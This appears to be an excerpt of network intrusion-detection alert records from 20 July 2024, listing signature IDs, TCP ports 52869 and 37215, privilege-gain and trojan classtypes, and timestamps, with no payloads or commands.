                      SID:2025132
                      Source Port:60852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.148116
                      SID:2831300
                      Source Port:56318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.532766
                      SID:2829579
                      Source Port:37978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.430092
                      SID:2027339
                      Source Port:50606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.359662
                      SID:2835222
                      Source Port:40352
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.014309
                      SID:2831300
                      Source Port:34218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.050437
                      SID:2829579
                      Source Port:35542
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.071207
                      SID:2025132
                      Source Port:53362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.109755
                      SID:2831300
                      Source Port:47094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.227912
                      SID:2025132
                      Source Port:37318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.498027
                      SID:2835222
                      Source Port:55310
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.257476
                      SID:2835222
                      Source Port:47182
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.422378
                      SID:2025132
                      Source Port:51472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.247273
                      SID:2831300
                      Source Port:42384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.756759
                      SID:2027339
                      Source Port:36960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.269499
                      SID:2027339
                      Source Port:47408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.067591
                      SID:2835222
                      Source Port:55780
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.661785
                      SID:2025132
                      Source Port:36092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.756259
                      SID:2829579
                      Source Port:48908
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.326086
                      SID:2831300
                      Source Port:35762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:19.575886
                      SID:2025132
                      Source Port:41920
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.544570
                      SID:2027339
                      Source Port:37284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.125247
                      SID:2027339
                      Source Port:41520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.136712
                      SID:2829579
                      Source Port:40440
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.345691
                      SID:2025132
                      Source Port:50464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.329793
                      SID:2829579
                      Source Port:35828
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.144876
                      SID:2025132
                      Source Port:43886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:27.562825
                      SID:2027339
                      Source Port:51934
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.377377
                      SID:2831300
                      Source Port:35816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.361141
                      SID:2025132
                      Source Port:39232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.153869
                      SID:2831300
                      Source Port:35276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.478181
                      SID:2027339
                      Source Port:46448
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:04.068388
                      SID:2025132
                      Source Port:37334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.521911
                      SID:2025132
                      Source Port:43282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.265687
                      SID:2027339
                      Source Port:33406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.080862
                      SID:2027339
                      Source Port:50074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.137269
                      SID:2835222
                      Source Port:52238
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.216313
                      SID:2025132
                      Source Port:40518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.382234
                      SID:2025132
                      Source Port:47948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:58.705456
                      SID:2831300
                      Source Port:57830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:17.564288
                      SID:2027339
                      Source Port:33970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.430020
                      SID:2835222
                      Source Port:49618
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.324702
                      SID:2027339
                      Source Port:45836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.091812
                      SID:2025132
                      Source Port:56846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.893152
                      SID:2025132
                      Source Port:33368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.449942
                      SID:2027339
                      Source Port:59306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.677505
                      SID:2829579
                      Source Port:34498
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.550045
                      SID:2027339
                      Source Port:51284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.274610
                      SID:2027339
                      Source Port:51318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.475273
                      SID:2831300
                      Source Port:53244
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.125044
                      SID:2027339
                      Source Port:54526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.614915
                      SID:2027339
                      Source Port:57316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.455022
                      SID:2831300
                      Source Port:50814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:13.525153
                      SID:2025132
                      Source Port:54330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:24.373833
                      SID:2025132
                      Source Port:49186
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.722490
                      SID:2025132
                      Source Port:53672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.325898
                      SID:2829579
                      Source Port:60530
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.094268
                      SID:2025132
                      Source Port:42610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.542289
                      SID:2027339
                      Source Port:58262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.234632
                      SID:2025132
                      Source Port:53108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.355198
                      SID:2025132
                      Source Port:59354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.324524
                      SID:2835222
                      Source Port:38498
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.542864
                      SID:2831300
                      Source Port:52072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.859779
                      SID:2835222
                      Source Port:43878
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.317008
                      SID:2027339
                      Source Port:53700
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.501247
                      SID:2829579
                      Source Port:37558
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.872548
                      SID:2025132
                      Source Port:41124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.540434
                      SID:2831300
                      Source Port:39614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.472951
                      SID:2027339
                      Source Port:39124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.808944
                      SID:2027339
                      Source Port:36558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.462607
                      SID:2027339
                      Source Port:57864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.466981
                      SID:2829579
                      Source Port:35392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.610945
                      SID:2027339
                      Source Port:45068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:23.916570
                      SID:2027339
                      Source Port:46438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.089846
                      SID:2027339
                      Source Port:36156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.203920
                      SID:2831300
                      Source Port:54424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.424851
                      SID:2829579
                      Source Port:52962
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.651872
                      SID:2831300
                      Source Port:58358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.991937
                      SID:2027339
                      Source Port:56958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.159645
                      SID:2831300
                      Source Port:57558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.827023
                      SID:2835222
                      Source Port:42340
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.502844
                      SID:2831300
                      Source Port:50060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.913786
                      SID:2027339
                      Source Port:36966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.589392
                      SID:2831300
                      Source Port:38836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.804757
                      SID:2027339
                      Source Port:45654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.620310
                      SID:2027339
                      Source Port:47114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.136226
                      SID:2027339
                      Source Port:52870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.491493
                      SID:2027339
                      Source Port:57944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.227912
                      SID:2027339
                      Source Port:38572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.459218
                      SID:2831300
                      Source Port:47800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:14.544693
                      SID:2025132
                      Source Port:40778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.622534
                      SID:2835222
                      Source Port:57942
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.517011
                      SID:2831300
                      Source Port:37654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.523834
                      SID:2831300
                      Source Port:48322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.021915
                      SID:2025132
                      Source Port:54678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.333210
                      SID:2027339
                      Source Port:39644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.256029
                      SID:2829579
                      Source Port:49404
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.103906
                      SID:2829579
                      Source Port:32858
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.971515
                      SID:2027339
                      Source Port:35054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.783693
                      SID:2829579
                      Source Port:40256
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.430184
                      SID:2829579
                      Source Port:36566
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.628127
                      SID:2027339
                      Source Port:38610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.442841
                      SID:2027339
                      Source Port:57824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.405121
                      SID:2829579
                      Source Port:49692
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.245589
                      SID:2829579
                      Source Port:44044
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.271822
                      SID:2835222
                      Source Port:33290
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.378063
                      SID:2831300
                      Source Port:52744
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.468009
                      SID:2835222
                      Source Port:59432
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.620376
                      SID:2027339
                      Source Port:47274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.542034
                      SID:2829579
                      Source Port:35914
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.119639
                      SID:2829579
                      Source Port:39148
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.522256
                      SID:2835222
                      Source Port:42998
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.036527
                      SID:2835222
                      Source Port:43408
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.159681
                      SID:2027339
                      Source Port:34720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.136885
                      SID:2831300
                      Source Port:38012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:18.158860
                      SID:2027339
                      Source Port:48954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.487250
                      SID:2831300
                      Source Port:47354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.462908
                      SID:2831300
                      Source Port:46216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.748553
                      SID:2829579
                      Source Port:48406
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.440173
                      SID:2027339
                      Source Port:32916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.893558
                      SID:2831300
                      Source Port:32924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.119988
                      SID:2831300
                      Source Port:33312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.170018
                      SID:2025132
                      Source Port:55752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.592016
                      SID:2027339
                      Source Port:42276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:08:18.360344
                      SID:2025132
                      Source Port:52800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:22.140723
                      SID:2025132
                      Source Port:40768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.653253
                      SID:2835222
                      Source Port:57044
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.457721
                      SID:2027339
                      Source Port:33128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.741345
                      SID:2027339
                      Source Port:52874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.124335
                      SID:2025132
                      Source Port:58394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:04.058070
                      SID:2835222
                      Source Port:53860
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.035942
                      SID:2835222
                      Source Port:59074
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.106479
                      SID:2831300
                      Source Port:55632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.426800
                      SID:2831300
                      Source Port:34152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.544972
                      SID:2831300
                      Source Port:49268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.290948
                      SID:2027339
                      Source Port:53408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.256504
                      SID:2025132
                      Source Port:36194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:03.257276
                      SID:2025132
                      Source Port:35668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.256029
                      SID:2835222
                      Source Port:41548
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.101716
                      SID:2027339
                      Source Port:46150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.055523
                      SID:2027339
                      Source Port:38644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.414465
                      SID:2835222
                      Source Port:58394
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.612114
                      SID:2831300
                      Source Port:33778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.143736
                      SID:2027339
                      Source Port:46318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.364015
                      SID:2025132
                      Source Port:36152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:23.120505
                      SID:2025132
                      Source Port:41328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.497165
                      SID:2831300
                      Source Port:57716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.361554
                      SID:2027339
                      Source Port:41612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.330643
                      SID:2831300
                      Source Port:58960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.782996
                      SID:2027339
                      Source Port:42168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.589589
                      SID:2027339
                      Source Port:53912
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.654274
                      SID:2829579
                      Source Port:51022
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.309569
                      SID:2027339
                      Source Port:33046
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.343631
                      SID:2835222
                      Source Port:55278
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.355766
                      SID:2831300
                      Source Port:39936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:05.685688
                      SID:2831300
                      Source Port:33874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:15.110617
                      SID:2025132
                      Source Port:51398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.087911
                      SID:2027339
                      Source Port:37362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.982337
                      SID:2027339
                      Source Port:58740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.469923
                      SID:2831300
                      Source Port:53502
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.131789
                      SID:2829579
                      Source Port:50136
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.531304
                      SID:2831300
                      Source Port:40316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.525433
                      SID:2025132
                      Source Port:36586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:22.925505
                      SID:2027339
                      Source Port:60808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:06.283235
                      SID:2027339
                      Source Port:49582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.947824
                      SID:2027339
                      Source Port:57568
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.190685
                      SID:2027339
                      Source Port:33404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:20.736535
                      SID:2025132
                      Source Port:35604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.934329
                      SID:2025132
                      Source Port:55918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:25.723282
                      SID:2027339
                      Source Port:59972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:04.345966
                      SID:2025132
                      Source Port:60696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:12.609835
                      SID:2831300
                      Source Port:34782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.383835
                      SID:2831300
                      Source Port:55590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:15.480465
                      SID:2027339
                      Source Port:51224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:55.877930
                      SID:2829579
                      Source Port:52608
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.071790
                      SID:2025132
                      Source Port:60622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.972369
                      SID:2025132
                      Source Port:43438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:26.800191
                      SID:2027339
                      Source Port:57250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.332387
                      SID:2835222
                      Source Port:45106
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.447263
                      SID:2831300
                      Source Port:55470
                      Destination Port:52869
                      Protocol:TCP
